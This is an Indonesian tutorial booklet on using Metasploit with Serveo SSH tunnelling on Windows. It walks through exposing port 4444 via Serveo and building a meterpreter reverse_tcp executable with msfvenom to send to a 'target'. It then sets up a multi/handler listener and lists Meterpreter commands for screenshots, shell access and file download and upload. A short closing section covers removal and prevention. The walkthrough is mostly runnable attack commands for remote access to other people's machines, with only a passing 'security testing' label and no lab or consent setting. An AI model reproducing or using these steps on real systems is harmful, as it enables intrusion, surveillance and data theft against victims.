Buku Materi: Penggunaan Metasploit
dengan Serveo di Windows
1. Pendahuluan
Metasploit adalah framework untuk pengujian keamanan, sedangkan Serveo adalah layanan
SSH tunneling yang memungkinkan perangkat dapat diakses dari luar jaringan lokal.
Buku ini menjelaskan cara menginstal dan menggunakan Metasploit + Serveo di Windows.
2. Instalasi & Persiapan
2.1 Instal Metasploit di Windows
1. Unduh Metasploit dari situs resminya
o Buka [Link]
o Unduh Metasploit Windows Installer
2. Install Metasploit
o Jalankan file .exe yang sudah diunduh.
o Ikuti proses instalasi hingga selesai.
3. Jalankan Metasploit Console
o Buka Command Prompt (cmd) sebagai administrator.
o Masukkan perintah:
o msfconsole
3. Konfigurasi Serveo di Windows
Karena Serveo berbasis SSH, kita membutuhkan klien SSH di Windows.
3.1 Instal OpenSSH untuk Windows
1. Buka PowerShell sebagai administrator.
2. Jalankan perintah:
3. Add-WindowsFeature -Name OpenSSH-Server
4. Jika sudah terinstal, jalankan layanan SSH dengan:
5. Start-Service sshd
6. Pastikan layanan berjalan:
7. Get-Service sshd
3.2 Jalankan Serveo untuk Port Forwarding
Setelah OpenSSH terinstal, kita bisa menjalankan Serveo.
1. Cek IP lokal Windows
o Buka Command Prompt (cmd)
o Jalankan:
o ipconfig
oCatat IPv4 Address yang biasanya dalam format 192.168.x.x.
2. Jalankan Serveo untuk port forwarding
o Masukkan perintah berikut di Command Prompt:
o ssh -R 4444:192.168.x.x:4444 [Link]
o Ganti 192.168.x.x dengan IP lokal Windows-mu!
4. Membuat Payload Metasploit di Windows
Setelah Serveo aktif, kita buat payload yang akan digunakan untuk mengakses perangkat
target.
1. Buka Metasploit Console
2. msfconsole
3. Buat payload untuk Windows
4. msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Link]
LPORT=4444 -f exe > [Link]
5. Menjalankan Listener di Metasploit
Setelah payload dibuat dan dikirim ke target, kita harus menjalankan listener agar bisa
menerima koneksi dari target.
1. Buka Metasploit di Windows
2. msfconsole
3. Gunakan exploit multi-handler
4. use exploit/multi/handler
5. Tentukan payload yang digunakan
6. set payload windows/meterpreter/reverse_tcp
7. Atur LHOST dan LPORT
8. set LHOST [Link]
9. set LPORT 4444
10. Jalankan listener
11. exploit
Jika target menjalankan [Link], sesi Meterpreter akan terbuka.
6. Perintah Penting di Meterpreter
Cek sesi aktif
sessions -i
Ambil screenshot dari target
screenshot
Buka shell target
shell
Melihat daftar file target
ls
Download file dari target
download namafile
Upload file ke target
upload namafile
7. Penutupan dan Pencegahan
7.1 Menghentikan Listener
Jika ingin menghentikan listener di Metasploit, gunakan:
exit
7.2 Menghapus Backdoor dari Target
Buka Task Manager, cari proses mencurigakan, lalu hentikan.
Hapus [Link] secara manual.
Gunakan Windows Defender untuk memindai ancaman.
7.3 Cara Mencegah Serangan Metasploit
Jangan menjalankan file .exe dari sumber tidak dikenal.
Gunakan firewall untuk mencegah akses luar.
Periksa lalu lintas jaringan dengan Wireshark.
8. Kesimpulan
Buku ini membahas cara menggunakan Metasploit di Windows dengan Serveo untuk
pengujian keamanan. Teknik ini bisa disalahgunakan, jadi pastikan untuk memahami juga
cara melindungi perangkat dari serangan serupa.